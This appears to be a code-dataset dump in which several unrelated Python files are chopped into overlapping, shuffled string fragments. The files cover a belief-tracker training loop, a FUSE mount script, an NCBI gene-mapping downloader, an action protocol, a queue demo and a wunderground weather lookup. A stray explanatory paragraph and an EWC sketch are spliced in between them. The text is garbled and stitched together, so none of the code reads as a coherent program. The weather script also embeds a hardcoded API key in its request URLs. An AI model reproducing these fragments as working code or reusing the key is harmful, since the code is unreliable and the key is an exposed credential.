training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) #", "2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1,", "logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\"", "[] label_info = '' label_map = [{_label: i for i, _label in enumerate(labels)}", "eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0,", "_get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid)", "= 0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value", "model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory", "= line[2] # line[2]: user utterance text_b = line[3] # line[3]: system response", "in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6'," ]
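The training step above adds args.lambda_ewc * ewc.penalty(model) to the task loss. For reference, a minimal diagonal-Fisher version of that penalty can be sketched as follows; this illustrates the technique only and is not the BeliefTrackerSlotQueryMultiSlotEWC implementation, and the attribute names fisher and star_params are assumptions.

import torch

class DiagonalEWC(object):
    """Sketch of an elastic weight consolidation penalty (illustrative only).

    fisher: parameter name -> diagonal Fisher estimate (same shape as the parameter).
    star_params: parameter name -> parameter snapshot taken after the previous task.
    """

    def __init__(self, fisher, star_params):
        self.fisher = fisher
        self.star_params = star_params

    def penalty(self, model):
        # sum_i F_i * (theta_i - theta*_i)^2 over the shared parameters
        total = torch.zeros((), device=next(model.parameters()).device)
        for name, param in model.named_parameters():
            if name in self.fisher:
                total = total + (self.fisher[name] * (param - self.star_params[name]) ** 2).sum()
        return total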
[ "sys import argv, exit import logging from fuse import FUSE if __name__ ==", "__name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1)", "-*- from s3encfs.s3fs import S3FS from sys import argv, exit import logging from", "exit import logging from fuse import FUSE if __name__ == '__main__': if len(argv)", "s3encfs.s3fs import S3FS from sys import argv, exit import logging from fuse import", "utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit import logging", "'__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse", "if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse =", "from s3encfs.s3fs import S3FS from sys import argv, exit import logging from fuse", "len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(),", "python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv,", "from sys import argv, exit import logging from fuse import FUSE if __name__", "!= 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(), argv[1],", "FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' %", "2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(), argv[1], foreground=True)", "import argv, exit import logging from fuse import FUSE if __name__ == '__main__':", "import logging from fuse import FUSE if __name__ == '__main__': if len(argv) !=", "logging from fuse import FUSE if __name__ == '__main__': if len(argv) != 2:", "fuse import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s", "from fuse import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage:", "S3FS from sys import argv, exit import logging from fuse import FUSE if", "== '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG)", "<gh_stars>0 #!/usr/bin/env python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys", "coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit import", "#-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit", "#!/usr/bin/env python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import", "import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>'", "if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0])", "import S3FS from sys import argv, exit import logging from fuse import FUSE", "argv, exit import logging from fuse import FUSE if __name__ == '__main__': if" ]
[ "mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0,", "urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index ==", ") # delete the full file os.remove(args.filepath) # dump the mapping file mapping_df.to_csv(args.filepath,", "NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request import pandas", "args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy", "where to store the file.', required=True ) if __name__ == '__main__': # parse", "for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the", "pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ],", "chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) # dump the", "if __name__ == '__main__': # parse arguments args = parser.parse_args() # download the", "# delete the full file os.remove(args.filepath) # dump the mapping file mapping_df.to_csv(args.filepath, sep='\\t')", "== TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) #", "sort=False ) # delete the full file os.remove(args.filepath) # dump the mapping file", "argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True )", "the latest NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request", "batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full", "to store the file.', required=True ) if __name__ == '__main__': # parse arguments", ") if __name__ == '__main__': # parse arguments args = parser.parse_args() # download", "= argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True", "parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True ) if", "file.', required=True ) if __name__ == '__main__': # parse arguments args = parser.parse_args()", "required=True ) if __name__ == '__main__': # parse arguments args = parser.parse_args() #", "taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath,", "help='path where to store the file.', required=True ) if __name__ == '__main__': #", "parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.',", "args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID]", "<filename>ipcrg/resources/id_mapping/download_human_gene_mapping.py<gh_stars>1-10 \"\"\"Download the latest NCBI id mapping for humans.\"\"\" import os import argparse", "# extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for", "# parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) #", "arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific", "], sort=False ) # delete the full file os.remove(args.filepath) # dump the mapping", "= 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', 
type=str, help='path where to store", "( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath',", "'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str,", "pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath)", "parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract", "import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = (", "data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t',", "pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser()", "the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [", "import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID", "= ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o',", "\"\"\"Download the latest NCBI id mapping for humans.\"\"\" import os import argparse import", "'__main__': # parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath)", "specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in", "import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606", ") TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where", "extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch", "= parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data", "argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' )", "batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False )", "TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to", "in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file", "file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index", "parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df", "import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz'", "'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path", "urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID =", "# download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific 
taxonomy data mapping_df =", "9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the", "latest NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request import", "os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/'", "index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) # dump", "__name__ == '__main__': # parse arguments args = parser.parse_args() # download the file", "id mapping for humans.\"\"\" import os import argparse import urllib.request import pandas as", "mapping for humans.\"\"\" import os import argparse import urllib.request import pandas as pd", "sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) #", "[ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False", "= pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000)", "download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat(", "'--filepath', type=str, help='path where to store the file.', required=True ) if __name__ ==", "as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser =", "type=str, help='path where to store the file.', required=True ) if __name__ == '__main__':", "TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete", "humans.\"\"\" import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH =", "the file.', required=True ) if __name__ == '__main__': # parse arguments args =", "pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser", "for humans.\"\"\" import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH", "MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument(", "store the file.', required=True ) if __name__ == '__main__': # parse arguments args", "'-o', '--filepath', type=str, help='path where to store the file.', required=True ) if __name__", "== '__main__': # parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH," ]
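The chunksize read is what keeps memory bounded: only 10000 rows of the multi-gigabyte gene2accession table are resident at a time, and only rows whose index (the tax id column) equals 9606 survive the filter. The same pattern as a standalone helper, a sketch in which filter_rows_by_index is not part of the source:

import pandas as pd

def filter_rows_by_index(path, index_value, sep='\t', chunksize=10000):
    """Stream a large delimited file, keeping only rows whose index matches."""
    kept = [
        chunk[chunk.index == index_value]
        for chunk in pd.read_csv(path, sep=sep, index_col=0, chunksize=chunksize)
    ]
    return pd.concat(kept, sort=False)

# e.g. human rows only: filter_rows_by_index('gene2accession.gz', 9606)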
[ "ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover", "mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel =", "List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload =", "component. The handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\"", "from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel", "= TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult =", "The handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\" def", "TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface", "if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]:", "ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} )", "or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int)", "bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action", "PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) ->", "from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\":", "Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The handle_request method", "Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel]", "ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult", "str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The", "# pragma: no cover \"\"\" Interface for action component. The handle_request method raises", "action component. The handle_request method raises ActionException or PermissionDenied if the request fails.", "\"\"\" Interface for action component. The handle_request method raises ActionException or PermissionDenied if", "import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict(", "method raises ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload:", "List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no", "raises ActionException or PermissionDenied if the request fails. 
\"\"\" def handle_request(self, payload: Payload,", "= TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\"", "import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\":", "= List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload", "typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str,", "TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\",", "TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\",", "{\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool,", "no cover \"\"\" Interface for action component. The handle_request method raises ActionException or", "ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id:", "Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload =", "handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self,", "Interface for action component. The handle_request method raises ActionException or PermissionDenied if the", "\"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\":", "= List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma:", "typing import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol", "from typing import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import", "the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]: ...", ") Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol):", "class Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The handle_request", "str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\":", "import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload", "pragma: no cover \"\"\" Interface for action component. The handle_request method raises ActionException", "Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str,", "cover \"\"\" Interface for action component. 
The handle_request method raises ActionException or PermissionDenied", "\"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str})", "Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): #", "\"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action component.", "Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload}", "List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]]", "{\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for", "for action component. The handle_request method raises ActionException or PermissionDenied if the request", "ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class" ]
[ "queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart = 0 while", "def putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart)", "not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__", "while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start()", "= 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart", "realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1", "putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart", "hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart + 1 def", "realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal():", "hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart =", "1 realStart = realStart + 1 def getHist(): while True: while not hist.empty():", "= realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def", "hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__ ==", "= 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart", "= queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart = 0", "print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\":", "real.put(realStart) histStart = histStart - 1 realStart = realStart + 1 def getHist():", "while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while True:", "= queue.Queue() def putData(): histStart = 0 realStart = 0 while True: time.sleep(1)", "real = queue.Queue() def putData(): histStart = 0 realStart = 0 while True:", "histStart - 1 realStart = realStart + 1 def getHist(): while True: while", "time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart + 1", "while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty():", "queue.Queue() def putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart)", "def getReal(): while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start()", "1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True:", "while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if", "getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not", "= histStart - 1 realStart = realStart + 1 def getHist(): while True:", "True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while", "histStart = histStart - 1 realStart = realStart + 1 def getHist(): while", "- 1 realStart = realStart + 1 def getHist(): while True: while not", "getReal(): while True: while not 
real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start()", "def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while", "not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while True: pass", "0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart -", "while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart", "histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart =", "0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart =", "queue, threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart =", "realStart = realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get())", "True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get())", "threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0", "+ 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while", "time hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart", "import queue, threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart", "<reponame>waltoncade/KSD_GroundSystems<gh_stars>1-10 import queue, threading, time hist = queue.Queue() real = queue.Queue() def putData():", "True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart +" ]
[ "latitude and longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated", "'.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions", "+ name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy =", "= coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/'", "comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise time,", "API key is valid. ''' name = coord + '.json' try: f =", "json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country']", "= json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin =", "import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script", "= parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr", "parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr =", "sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin", "Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp", "+ \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr", "''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m", "f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read()", "city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr", "sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp,", "The purpose of this script is to retrieve meteorological data of a given", "temp in F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions:", "to retrieve meteorological data of a given comma-separated latitude and longitute coordinates via", "sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" +", "time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key", "coord: string representing comma-separated coordinates. 
Outputs: weatherData: tuple of city, country, temp in", "urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions =", "= parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData", "f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city']", "import json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The", "dictionary with 5 keys. Assumptions: The wunderground API key is valid. ''' name", "parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData =", "wunderground API key is valid. ''' name = coord + '.json' try: f", "sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset}", "weatherData: tuple of city, country, temp in F, sunrise time, sunset time. Returns:", "+ sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\"", "= {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception:", "the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of", "= parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city,", "temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr +", "{'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print", "purpose of this script is to retrieve meteorological data of a given comma-separated", "m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy =", "a given comma-separated latitude and longitute coordinates via the wunderground API. 
